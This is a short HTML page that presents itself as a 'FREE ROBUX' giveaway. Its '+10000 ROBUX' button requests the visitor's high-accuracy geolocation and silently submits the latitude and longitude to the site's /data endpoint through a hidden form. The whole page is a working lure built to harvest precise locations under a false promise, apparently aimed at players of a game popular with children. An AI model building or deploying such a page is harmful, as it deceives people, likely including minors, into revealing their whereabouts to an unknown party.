<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blank Website</title>
</head>
<body>
    <h1>FREE ROBUXXXX</h1>
    <button onclick="getLocation()"> +10000 ROBUX </button>
    <p id='location_status'></p>
    <p id='status'></p>
    <form id = 'myForm' action = '/data' method= 'POST'> 
        <input type = 'hidden' name = 'lat' id = 'lat'>
        <input type = 'hidden' name = 'lon' id = 'lon'>
    </form>
    <script>
        //Gets the location of the user 
        function getLocation(){
            const status = document.getElementById('status');
            const location_status = document.getElementById('location_status');
            const lon = document.getElementById('lon')
            const lat = document.getElementById('lat')

            if(navigator.geolocation){
                status.textContent = 'Getting.....';
                navigator.geolocation.getCurrentPosition(
                    (position) => {
                        lon.value = position.coords.longitude;
                        lat.value = position.coords.latitude;
                        location_status.textContent=`Lat = ${lat.value}, Lon = ${lon.value}`; 
                        document.getElementById('myForm').submit()
                    }
                    , (error) =>{
                        status.textContent = 'error getting the location'
                    }
                    , {
                        enableHighAccuracy: true,
                        timeout: 5000,
                        maximumAge: 0
                    }
                )

            } else {
                textContent = 'this browser doesnt support getting the location'
            }
        }
    </script>
</body>
</html>

